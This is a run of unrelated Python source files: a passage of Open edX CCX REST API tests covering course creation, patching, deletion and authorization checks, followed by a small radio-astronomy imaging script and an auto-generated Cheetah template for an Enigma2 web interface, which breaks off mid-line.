'[email protected]', 'course_modules': ['foo', 'bar'] }, {'course_modules': 'invalid_course_module_keys'}, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': '[email protected]', 'course_modules': ['foo', 'bar'] }, {'course_modules': 'invalid_course_module_keys'}, 'auth_header_oauth2_provider' ), ) @ddt.unpack def test_post_list_wrong_input_data(self, data, expected_errors, auth_attr): """ Test for various post requests with wrong input data """ # add the master_course_key_str to the request data data['master_course_id'] = self.master_course_key_str resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error_fields(expected_errors, resp) @ddt.data(*AUTH_ATTRS) def test_post_list_coach_does_not_exist(self, auth_attr): """ Specific test for the case when the input data is valid but the coach does not exist. """ data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Title', 'coach_email': '[email protected]' } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp) @ddt.data(*AUTH_ATTRS) def test_post_list_wrong_modules(self, auth_attr): """ Specific test for the case when the input data is valid but the course modules do not belong to the master course """ data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Title', 'coach_email': self.coach.email, 'course_modules': [ 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo', 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar' ] } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp) @ddt.data(*AUTH_ATTRS) def test_post_list_mixed_wrong_and_valid_modules(self, auth_attr): """ Specific test for the case when the input data is valid but some of the course modules do not belong to the master course """ modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo'] data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Title', 'coach_email': self.coach.email, 'course_modules': modules } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp) @ddt.data(*AUTH_ATTRS) def test_post_list(self, auth_attr): """ Test the creation of a CCX """ outbox = self.get_outbox() data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email, 'course_modules': self.master_course_chapters[0:1] } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # check if the response has at least the same data of the request for key, val in data.iteritems(): self.assertEqual(resp.data.get(key), val) # pylint: disable=no-member self.assertIn('ccx_course_id', resp.data) # pylint: disable=no-member # check that the new CCX actually exists course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member ccx_course = CustomCourseForEdX.objects.get(pk=course_key.ccx) self.assertEqual( unicode(CCXLocator.from_course_locator(ccx_course.course.id, ccx_course.id)), resp.data.get('ccx_course_id') # pylint: disable=no-member ) # check that the coach user has coach role on the master course coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key) self.assertTrue(coach_role_on_master_course.has_user(self.coach)) # check that the coach has been enrolled in the ccx ccx_course_object = courses.get_course_by_id(course_key) self.assertTrue( CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=self.coach).exists() ) # check that an email has been sent to the coach self.assertEqual(len(outbox), 1) self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member @ddt.data( ('auth', True), ('auth', False), ('auth_header_oauth2_provider', True), ('auth_header_oauth2_provider', False) ) @ddt.unpack def test_post_list_on_active_state(self, auth_attr, user_is_active): """ Test the creation of a CCX on user's active states. """ self.app_user.is_active = user_is_active self.app_user.save() # pylint: disable=no-member data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email, 'course_modules': self.master_course_chapters[0:1] } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) if not user_is_active: self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) else: self.assertEqual(resp.status_code, status.HTTP_201_CREATED) @ddt.data(*AUTH_ATTRS) def test_post_list_duplicated_modules(self, auth_attr): """ Test the creation of a CCX, but with duplicated modules """ chapters = self.master_course_chapters[0:1] duplicated_chapters = chapters * 3 data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email, 'course_modules': duplicated_chapters } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) self.assertEqual(resp.data.get('course_modules'), chapters) # pylint: disable=no-member @ddt.data(*AUTH_ATTRS) def test_post_list_staff_master_course_in_ccx(self, auth_attr): """ Specific test to check that the staff and instructor of the master course are assigned to the CCX. """ outbox = self.get_outbox() data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email } resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_201_CREATED) # check that only one email has been sent and it is to to the coach self.assertEqual(len(outbox), 1) self.assertIn(self.coach.email, outbox[0].recipients()) # pylint: disable=no-member list_staff_master_course = list_with_level(self.course, 'staff') list_instructor_master_course = list_with_level(self.course, 'instructor') course_key = CourseKey.from_string(resp.data.get('ccx_course_id')) # pylint: disable=no-member with ccx_course_cm(course_key) as course_ccx: list_staff_ccx_course = list_with_level(course_ccx, 'staff') list_instructor_ccx_course = list_with_level(course_ccx, 'instructor') # The "Coach" in the parent course becomes "Staff" on the CCX, so the CCX should have 1 "Staff" # user more than the parent course self.assertEqual(len(list_staff_master_course) + 1, len(list_staff_ccx_course)) # Make sure all of the existing course staff are passed to the CCX for course_user in list_staff_master_course: self.assertIn(course_user, list_staff_ccx_course) # Make sure the "Coach" on the parent course is "Staff" on the CCX self.assertIn(self.coach, list_staff_ccx_course) self.assertEqual(len(list_instructor_master_course), len(list_instructor_ccx_course)) for course_user, ccx_user in izip(sorted(list_instructor_master_course), sorted(list_instructor_ccx_course)): self.assertEqual(course_user, ccx_user) @attr(shard=1) @ddt.ddt class CcxDetailTest(CcxRestApiTest): """ Test for the CCX REST APIs """ ENABLED_SIGNALS = ['course_published'] def setUp(self): """ Set up tests """ super(CcxDetailTest, self).setUp() self.make_coach() # create a ccx self.ccx = self.make_ccx(max_students_allowed=123) self.ccx_key = CCXLocator.from_course_locator(self.ccx.course.id, self.ccx.id) self.ccx_key_str = unicode(self.ccx_key) self.detail_url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.ccx_key_str}) def make_ccx(self, max_students_allowed=200): """ Overridden method to replicate (part of) the actual creation of ccx courses """ ccx = super(CcxDetailTest, self).make_ccx(max_students_allowed=max_students_allowed) ccx.structure_json = json.dumps(self.master_course_chapters) ccx.save() override_field_for_ccx(ccx, self.course, 'start', now()) override_field_for_ccx(ccx, self.course, 'due', None) # Hide anything that can show up in the schedule hidden = 'visible_to_staff_only' for chapter in self.course.get_children(): override_field_for_ccx(ccx, chapter, hidden, True) for sequential in chapter.get_children(): override_field_for_ccx(ccx, sequential, hidden, True) for vertical in sequential.get_children(): override_field_for_ccx(ccx, vertical, hidden, True) # enroll the coach in the CCX ccx_course_key = CCXLocator.from_course_locator(self.course.id, ccx.id) email_params = get_email_params( self.course, auto_enroll=True, course_key=ccx_course_key, display_name=ccx.display_name ) enroll_email( course_id=ccx_course_key, student_email=self.coach.email, auto_enroll=True, email_students=False, email_params=email_params, ) return ccx @ddt.data(*AUTH_ATTRS) def test_authorization(self, auth_attr): """ Test that only the right token is authorized """ auth_list = [ "Wrong token-type-obviously", "Bearer wrong token format", "Bearer wrong-token", "Bearer", "Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token ] # all the auths in the list fail to authorize for auth in auth_list: resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=auth) self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED) resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_authorization_no_oauth_staff(self): """ Check authorization for staff users logged in without oauth """ # create a staff user staff_user = User.objects.create_user('test_staff_user', '[email protected]', 'test') # add staff role to the staff user CourseStaffRole(self.master_course_key).add_users(staff_user) data = {'display_name': 'CCX Title'} # the staff user can perform the request self.client.login(username=staff_user.username, password=USER_PASSWORD) resp = self.client.get(self.detail_url) self.assertEqual(resp.status_code, status.HTTP_200_OK) resp = self.client.patch(self.detail_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) def test_authorization_no_oauth_instructor(self): """ Check authorization for users logged in without oauth """ # create an instructor user instructor_user = User.objects.create_user('test_instructor_user', '[email protected]', 'test') # add instructor role to the instructor user CourseInstructorRole(self.master_course_key).add_users(instructor_user) data = {'display_name': 'CCX Title'} # the instructor user can perform the request self.client.login(username=instructor_user.username, password=USER_PASSWORD) resp = self.client.get(self.detail_url) self.assertEqual(resp.status_code, status.HTTP_200_OK) resp = self.client.patch(self.detail_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) def test_authorization_no_oauth_other_coach(self): """ Check authorization for other coach users logged in without oauth """ # create an coach user coach_user = User.objects.create_user('test_coach_user', '[email protected]', 'test') # add coach role to the coach user CourseCcxCoachRole(self.master_course_key).add_users(coach_user) data = {'display_name': 'CCX Title'} # the coach user cannot perform the request: this type of user can only get her own CCX self.client.login(username=coach_user.username, password=USER_PASSWORD) resp = self.client.get(self.detail_url) self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) resp = self.client.patch(self.detail_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) def test_authorization_no_oauth_ccx_coach(self): """ Check authorization for ccx coach users logged in without oauth """ data = {'display_name': 'CCX Title'} # the coach owner of the CCX can perform the request only if it is a get self.client.login(username=self.coach.username, password=USER_PASSWORD) resp = self.client.get(self.detail_url) self.assertEqual(resp.status_code, status.HTTP_200_OK) resp = self.client.patch(self.detail_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) def test_resolve_get_detail(self): """ Test for the ccx detail view resolver. This is needed because it is assumed that only an URL with a valid course id string can reach the detail view. """ # get the base url from the valid one to build invalid urls base_url = '{0}/'.format(self.detail_url.rsplit('/', 1)[0]) # this url should be the same of the ccx list view resolver = resolve(base_url) self.assertEqual(views.CCXListView.__name__, resolver.func.__name__) self.assertEqual(views.CCXListView.__module__, resolver.func.__module__) # invalid urls for invalid_ccx_id in ('foo', 'ccx-v1:org.0', 'ccx-v1:org.0+course_0'): with self.assertRaises(Resolver404): resolve('{0}{1}'.format(base_url, invalid_ccx_id)) # the following course ID works even if it is not a CCX valid course id (the regex matches course ID strings) resolver = resolve('{0}{1}'.format(base_url, 'ccx-v1:org.0+course_0+Run_0')) self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__) self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__) # and of course a valid ccx course id resolver = resolve('{0}{1}'.format(base_url, self.ccx_key_str)) self.assertEqual(views.CCXDetailView.__name__, resolver.func.__name__) self.assertEqual(views.CCXDetailView.__module__, resolver.func.__module__) @ddt.data( ('get', AUTH_ATTRS[0]), ('get', AUTH_ATTRS[1]), ('delete', AUTH_ATTRS[0]), ('delete', AUTH_ATTRS[1]), ('patch', AUTH_ATTRS[0]), ('patch', AUTH_ATTRS[1]) ) @ddt.unpack def test_detail_wrong_ccx(self, http_method, auth_attr): """ Test for different methods for detail of a ccx course. All check the validity of the ccx course id """ client_request = getattr(self.client, http_method) # get a detail url with a master_course id string mock_class_str = 'openedx.core.lib.api.permissions.IsCourseStaffInstructor.has_object_permission' url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': self.master_course_key_str}) # the permission class will give a 403 error because will not find the CCX resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) # bypassing the permission class we get another kind of error with mock.patch(mock_class_str, autospec=True) as mocked_perm_class: mocked_perm_class.return_value = True resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid_ccx_id', resp) # use an non existing ccx id url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': 'ccx-v1:foo.0+course_bar_0+Run_0+ccx@1'}) # the permission class will give a 403 error because will not find the CCX resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) # bypassing the permission class we get another kind of error with mock.patch(mock_class_str, autospec=True) as mocked_perm_class: mocked_perm_class.return_value = True resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp) # get a valid ccx key and add few 0s to get a non existing ccx for a valid course ccx_key_str = '{0}000000'.format(self.ccx_key_str) url = reverse('ccx_api:v0:ccx:detail', kwargs={'ccx_course_id': ccx_key_str}) # the permission class will give a 403 error because will not find the CCX resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) # bypassing the permission class we get another kind of error with mock.patch(mock_class_str, autospec=True) as mocked_perm_class: mocked_perm_class.return_value = True resp = client_request(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_404_NOT_FOUND, 'ccx_course_id_does_not_exist', resp) @ddt.data(*AUTH_ATTRS) def test_get_detail(self, auth_attr): """ Test for getting detail of a ccx course """ resp = self.client.get(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data.get('ccx_course_id'), self.ccx_key_str) # pylint: disable=no-member self.assertEqual(resp.data.get('display_name'), self.ccx.display_name) # pylint: disable=no-member self.assertEqual( resp.data.get('max_students_allowed'), # pylint: disable=no-member self.ccx.max_student_enrollments_allowed # pylint: disable=no-member ) self.assertEqual(resp.data.get('coach_email'), self.ccx.coach.email) # pylint: disable=no-member self.assertEqual(resp.data.get('master_course_id'), unicode(self.ccx.course_id)) # pylint: disable=no-member self.assertItemsEqual(resp.data.get('course_modules'), self.master_course_chapters) # pylint: disable=no-member @ddt.data(*AUTH_ATTRS) def test_delete_detail(self, auth_attr): """ Test for deleting a ccx course """ # check that there are overrides self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0) self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0) resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) self.assertIsNone(resp.data) # pylint: disable=no-member # the CCX does not exist any more with self.assertRaises(CustomCourseForEdX.DoesNotExist): CustomCourseForEdX.objects.get(id=self.ccx.id) # check that there are no overrides self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0) self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0) @ddt.data(*AUTH_ATTRS) def test_patch_detail_change_master_course(self, auth_attr): """ Test to patch a ccx course to change a master course """ data = { 'master_course_id': 'changed_course_id' } resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_403_FORBIDDEN, 'master_course_id_change_not_allowed', resp) @ddt.data( ( { 'max_students_allowed': None, 'display_name': None, 'coach_email': None }, { 'max_students_allowed': 'null_field_max_students_allowed', 'display_name': 'null_field_display_name', 'coach_email': 'null_field_coach_email' }, AUTH_ATTRS[0] ), ( { 'max_students_allowed': None, 'display_name': None, 'coach_email': None }, { 'max_students_allowed': 'null_field_max_students_allowed', 'display_name': 'null_field_display_name', 'coach_email': 'null_field_coach_email' }, AUTH_ATTRS[1] ), ( {'coach_email': 'this is not an [email protected]'}, {'coach_email': 'invalid_coach_email'}, AUTH_ATTRS[0] ), ( {'coach_email': 'this is not an [email protected]'}, {'coach_email': 'invalid_coach_email'}, AUTH_ATTRS[1] ), ( {'display_name': ''}, {'display_name': 'invalid_display_name'}, AUTH_ATTRS[0] ), ( {'display_name': ''}, {'display_name': 'invalid_display_name'}, AUTH_ATTRS[1] ), ( {'max_students_allowed': 'a'}, {'max_students_allowed': 'invalid_max_students_allowed'}, AUTH_ATTRS[0] ), ( {'max_students_allowed': 'a'}, {'max_students_allowed': 'invalid_max_students_allowed'}, AUTH_ATTRS[1] ), ( {'course_modules': {'foo': 'bar'}}, {'course_modules': 'invalid_course_module_list'}, AUTH_ATTRS[0] ), ( {'course_modules': {'foo': 'bar'}}, {'course_modules': 'invalid_course_module_list'}, AUTH_ATTRS[1] ), ( {'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'}, {'course_modules': 'invalid_course_module_list'}, AUTH_ATTRS[0] ), ( {'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1'}, {'course_modules': 'invalid_course_module_list'}, AUTH_ATTRS[1] ), ( {'course_modules': ['foo', 'bar']}, {'course_modules': 'invalid_course_module_keys'}, AUTH_ATTRS[0] ), ( {'course_modules': ['foo', 'bar']}, {'course_modules': 'invalid_course_module_keys'}, AUTH_ATTRS[1] ), ) @ddt.unpack def test_patch_detail_wrong_input_data(self, data, expected_errors, auth_attr): """ Test for different wrong inputs for the patch method """ resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error_fields(expected_errors, resp) @ddt.data(*AUTH_ATTRS) def test_empty_patch(self, auth_attr): """ An empty patch does not modify anything """ display_name = self.ccx.display_name max_students_allowed = self.ccx.max_student_enrollments_allowed # pylint: disable=no-member coach_email = self.ccx.coach.email # pylint: disable=no-member ccx_structure = self.ccx.structure # pylint: disable=no-member resp = self.client.patch(self.detail_url, {}, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertEqual(display_name, ccx.display_name) self.assertEqual(max_students_allowed, ccx.max_student_enrollments_allowed) self.assertEqual(coach_email, ccx.coach.email) self.assertEqual(ccx_structure, ccx.structure) @ddt.data(*AUTH_ATTRS) def test_patch_detail_coach_does_not_exist(self, auth_attr): """ Specific test for the case when the input data is valid but the coach does not exist. """ data = { 'max_students_allowed': 111, 'display_name': 'CCX Title', 'coach_email': '[email protected]' } resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_404_NOT_FOUND, 'coach_user_does_not_exist', resp) @ddt.data(*AUTH_ATTRS) def test_patch_detail_wrong_modules(self, auth_attr): """ Specific test for the case when the input data is valid but the course modules do not belong to the master course """ data = { 'course_modules': [ 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo', 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_bar' ] } resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp) @ddt.data(*AUTH_ATTRS) def test_patch_detail_mixed_wrong_and_valid_modules(self, auth_attr): """ Specific test for the case when the input data is valid but some of the course modules do not belong to the master course """ modules = self.master_course_chapters[0:1] + ['block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_foo'] data = { 'course_modules': modules } resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_module_list_not_belonging_to_master_course', resp) @ddt.data(*AUTH_ATTRS) def test_patch_detail(self, auth_attr): """ Test for successful patch """ outbox = self.get_outbox() # create a new coach new_coach = AdminFactory.create() data = { 'max_students_allowed': 111, 'display_name': 'CCX Title', 'coach_email': new_coach.email } resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertEqual(ccx_from_db.max_student_enrollments_allowed, data['max_students_allowed']) self.assertEqual(ccx_from_db.display_name, data['display_name']) self.assertEqual(ccx_from_db.coach.email, data['coach_email']) # check that the coach user has coach role on the master course coach_role_on_master_course = CourseCcxCoachRole(self.master_course_key) self.assertTrue(coach_role_on_master_course.has_user(new_coach)) # check that the coach has been enrolled in the ccx ccx_course_object = courses.get_course_by_id(self.ccx_key) self.assertTrue( CourseEnrollment.objects.filter(course_id=ccx_course_object.id, user=new_coach).exists() ) # check that an email has been sent to the coach self.assertEqual(len(outbox), 1) self.assertIn(new_coach.email, outbox[0].recipients()) # pylint: disable=no-member @ddt.data(*AUTH_ATTRS) def test_patch_detail_modules(self, auth_attr): """ Specific test for successful patch of the course modules """ data = {'course_modules': self.master_course_chapters[0:1]} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertItemsEqual(ccx_from_db.structure, data['course_modules']) data = {'course_modules': []} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertItemsEqual(ccx_from_db.structure, []) data = {'course_modules': self.master_course_chapters} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertItemsEqual(ccx_from_db.structure, self.master_course_chapters) data = {'course_modules': None} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertEqual(ccx_from_db.structure, None) chapters = self.master_course_chapters[0:1] data = {'course_modules': chapters * 3} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertItemsEqual(ccx_from_db.structure, chapters) @ddt.data( ('auth', True), ('auth', False), ('auth_header_oauth2_provider', True), ('auth_header_oauth2_provider', False) ) @ddt.unpack def test_patch_user_on_active_state(self, auth_attr, user_is_active): """ Test patch ccx course on user's active state. """ self.app_user.is_active = user_is_active self.app_user.save() # pylint: disable=no-member chapters = self.master_course_chapters[0:1] data = {'course_modules': chapters * 3} resp = self.client.patch(self.detail_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) if not user_is_active: self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) else: self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) ccx_from_db = CustomCourseForEdX.objects.get(id=self.ccx.id) self.assertItemsEqual(ccx_from_db.structure, chapters) @ddt.data( ('auth', True), ('auth', False), ('auth_header_oauth2_provider', True), ('auth_header_oauth2_provider', False) ) @ddt.unpack def test_delete_detail_on_active_state(self, auth_attr, user_is_active): """ Test for deleting a ccx course on user's active state. """ self.app_user.is_active = user_is_active self.app_user.save() # pylint: disable=no-member # check that there are overrides self.assertGreater(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0) self.assertGreater(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0) resp = self.client.delete(self.detail_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) if not user_is_active: self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) else: self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT) self.assertIsNone(resp.data) # pylint: disable=no-member # the CCX does not exist any more with self.assertRaises(CustomCourseForEdX.DoesNotExist): CustomCourseForEdX.objects.get(id=self.ccx.id) # check that there are no overrides self.assertEqual(CcxFieldOverride.objects.filter(ccx=self.ccx).count(), 0) self.assertEqual(CourseEnrollment.objects.filter(course_id=self.ccx_key).count(), 0)
#!/usr/bin/env python3 import sys import numpy as np from arthur.imaging import full_calculation, calculate_lag from arthur.io import read_full from arthur.plot import plot_image, plot_lag, plot_chan_power, plot_corr_mat, plot_diff from arthur.constants import NUM_CHAN from matplotlib import pyplot FRQ = 58398437.5 # Central observation frequency in Hz def main(): if len(sys.argv) < 2: print("Image the first set of visibilites from a visibilities file") print() print("usage: {} <file>".format(sys.argv[0])) sys.exit(1) else: path = sys.argv[1] # define them here so we can access them out of for loop scope lags = [] prev_data = date = img_data = corr_data = diff_data = None chan_data = np.zeros((NUM_CHAN, 60), dtype=np.float32) for date, body in read_full(path): img_data, corr_data, chan_row = full_calculation(body, FRQ) lags += [calculate_lag(date).seconds] if prev_data is None: prev_data = img_data chan_data = np.roll(chan_data, 1) chan_data[:, 0] = chan_row diff_data = img_data - prev_data prev_data = img_data fig_img = plot_image(date, img_data, FRQ) fig_lag = plot_lag(lags) fig_chan = plot_chan_power(chan_data) fig_cm = plot_corr_mat(corr_data, FRQ, date) fig_diff = plot_diff(diff_data, FRQ, date) pyplot.show() if __name__ == '__main__': main()
#!/usr/bin/env python ################################################## ## DEPENDENCIES import sys import os import os.path try: import builtins as builtin except ImportError: import __builtin__ as builtin from os.path import getmtime, exists import time import types from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple from Cheetah.Template import Template from Cheetah.DummyTransaction import * from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList from Cheetah.CacheRegion import CacheRegion import Cheetah.Filters as Filters import Cheetah.ErrorCatchers as ErrorCatchers ################################################## ## MODULE CONSTANTS VFFSL=valueFromFrameOrSearchList VFSL=valueFromSearchList VFN=valueForName currentTime=time.time __CHEETAH_version__ = '2.4.4' __CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0) __CHEETAH_genTime__ = 1364979192.551085 __CHEETAH_genTimestamp__ = 'Wed Apr 3 17:53:12 2013' __CHEETAH_src__ = '/home/fermi/Work/Model/tmsingle/openpli3.0/build-tmsingle/tmp/work/mips32el-oe-linux/enigma2-plugin-extensions-openwebif-0.1+git1+279a2577c3bc6defebd4bf9e61a046dcf7f37c01-r0.72/git/plugin/controllers/views/web/deviceinfo.tmpl' __CHEETAH_srcLastModified__ = 'Wed Apr 3 17:10:17 2013' __CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine' if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple: raise AssertionError( 'This template was compiled with Cheetah version' ' %s. Templates compiled before version %s must be recompiled.'%( __CHEETAH_version__, RequiredCheetahVersion)) ################################################## ## CLASSES class deviceinfo(Template): ################################################## ## CHEETAH GENERATED METHODS def __init__(self, *args, **KWs): super(deviceinfo, self).__init__(*args, **KWs) if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) def respond(self, trans=None): ## CHEETAH: main method generated for this template if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)): trans = self.transaction # is None unless self.awake() was called if not trans: trans = DummyTransaction() _dummyTrans = True else: _dummyTrans = False write = trans.response().write SL = self._CHEETAH__searchList _filter = self._CHEETAH__currentFilter ######################################## ## START - generated method body _orig_filter_63410281 = _filter filterName = u'WebSafe' if self._CHEETAH__filters.has_key("WebSafe"): _filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName] else: _filter = self._CHEETAH__currentFilter = \ self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter write(u'''<?xml version="1.0" encoding="UTF-8"?> <e2deviceinfo> \t<e2enigmaversion>''') _v = VFFSL(SL,"enigmaver",True) # u'$enigmaver' on line 4, col 19 if _v is not None: write(_filter(_v, rawExpr=u'$enigmaver')) # from line 4, col 19. write(u'''</e2enigmaversion> \t<e2imageversion>''') _v = VFFSL(SL,"imagever",True) # u'$imagever' on line 5, col 18 if _v is not None: write(_filter(_v, rawExpr=u'$imagever')) # from line 5, col 18. write(u'''</e2imageversion> \t<e2webifversion>''') _v = VFFSL(SL,"webifver",True) # u'$webifver' on line 6, col 18 if _v is not None: write(_filter(_v, rawExpr=u'$webifver')) # from line 6, col 18. write(u'''</e2webifversion> \t<e2fpversion>''') _v = VFFSL(SL,"str",False)(VFFSL(SL,"fp_version",True)) # u'$str($fp_version)' on line 7, col 15 if _v is not None: write(_filter(_v, rawExpr=u'$str($fp_version)')) # from line 7, col 15. write(u'''</e2fpversion> \t<e2devicename>''') _v = VFFSL(SL,"model",True) # u'$model' on line 8, col 16 if 